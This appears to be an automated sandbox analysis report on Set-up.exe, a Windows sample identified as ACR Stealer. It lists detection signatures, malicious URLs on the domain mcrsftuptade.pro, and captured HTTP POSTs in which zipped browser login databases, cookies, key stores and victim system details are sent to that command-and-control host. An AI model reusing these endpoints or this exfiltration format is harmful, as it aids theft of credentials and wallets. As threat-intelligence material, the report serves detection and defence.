Windows Analysis Report
Set-up.exe

General Information

Sample name:	Set-up.exe
Analysis ID:	1686587
Has dependencies:	false
MD5:	b21f13cf1a28ffc443ca52a022c78c3d
SHA1:	7704084a3977b18d2ac687eef97bb3cb27e33ff2
SHA256:	6cd56f0b601722945ffc79d0a5468784fe9b1552fdd1931a64cd0f5608a7d697
Tags:	de-pumpedexeuser-abuse_ch
Infos:	yara

Detection

ACR Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Suricata IDS alerts for network traffic

Yara detected ACR Stealer

Allocates memory in foreign processes

Found direct / indirect Syscall (likely to bypass EDR)

Found many strings related to Crypto-Wallets (likely being stolen)

Joe Sandbox ML detected suspicious sample

Modifies the context of a thread in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal from password manager

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

PE file contains sections with non-standard names

Sample file is different than original file name gathered from version info

Searches for user specific document files

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Yara detected Credential Stealer

Classification

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://mcrsftuptade.pro/Up/g	Avira URL Cloud: Label: malware
Source: http://mcrsftuptade.pro/Up/p	Avira URL Cloud: Label: malware
Source: http://mcrsftuptade.pro/Up/b	Avira URL Cloud: Label: malware
Source: http://mcrsftuptade.pro/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371	Avira URL Cloud: Label: malware
Source: http://mcrsftuptade.pro/Up	Avira URL Cloud: Label: malware

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 90.1%

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_02682F00 LoadLibraryA,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,CryptUnprotectData,FreeLibrary,FreeLibrary,FreeLibrary,

0_2_02682F00

Uses 32bit PE files

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2052674 - Severity 1 - ET MALWARE ACR Stealer CnC Checkin Attempt : 192.168.2.5:49691 -> 188.114.96.3:80

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1Host: mcrsftuptade.proConnection: close
Source: global traffic	HTTP traffic detected: POST /Up HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 291Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 6b 5b 94 e6 71 00 00 00 71 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6c 22 3a 22 31 37 34 36 38 35 37 31 32 36 31 34 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 5a 41 45 42 41 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 7d 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 6b 5b 94 e6 71 00 00 00 71 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 50 4b 05 06 00 00 00 00 01 00 01 00 56 00 00 00 b7 00 00 00 00 00 Data Ascii: PK\d!Rk[qq(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"l":"1746857126149e146be9-c76a-4720-bcdb-53011b87bd06","bt":"ZAEBA","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06"}PK\d!Rk[qq(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKV
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 41649Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 c3 94 76 3c 00 a0 00 00 00 a0 00 00 11 00 00 00 62 2f 63 38 2f 30 2f 4c 6f 67 69 6e 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 02 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 7a 70 05 00 00 00 01 07 fb 00 00 00 00 0d 07 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 51889Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 e5 a5 64 a8 00 c8 00 00 00 c8 00 00 11 00 00 00 62 2f 63 39 2f 30 2f 4c 6f 67 69 6e 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 01 00 00 00 19 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 2e 6a d0 05 00 00 00 02 07 f6 00 00 00 00 18 07 fb 07 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 524940Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 90 a5 8e 8e 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 25259Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 a9 82 77 8d 00 60 00 00 00 60 00 00 0e 00 00 00 62 2f 63 38 2f 30 2f 43 6f 6f 6b 69 65 73 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 00 00 00 0c 00 00 00 06 00 00 00 04 00 00 00 01 00 00 00 17 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 2e 7a 70 0d 0d 18 00 04 09 f1 00 0f 67 0f cf 0a ae 09 f1 09 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 21163Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 23 6d d8 2e 00 50 00 00 00 50 00 00 0e 00 00 00 62 2f 63 39 2f 30 2f 43 6f 6f 6b 69 65 73 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 00 00 00 07 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 2e 6a d0 0d 0d 24 00 04 0a 0c 00 0f 67 0f cf 0a 0c 0c 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 623250Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 90 a5 8e 8e 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: POST /Up/p HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 489Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 ff 07 87 57 37 01 00 00 37 01 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6f 22 3a 22 57 69 6e 64 6f 77 73 20 31 30 22 2c 22 75 6e 22 3a 22 61 6c 66 6f 6e 73 22 2c 22 70 22 3a 22 41 4c 46 4f 4e 53 2d 50 43 22 2c 22 61 22 3a 22 78 36 34 22 2c 22 63 22 3a 34 2c 22 6c 22 3a 22 31 37 34 36 38 35 37 31 32 36 31 34 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 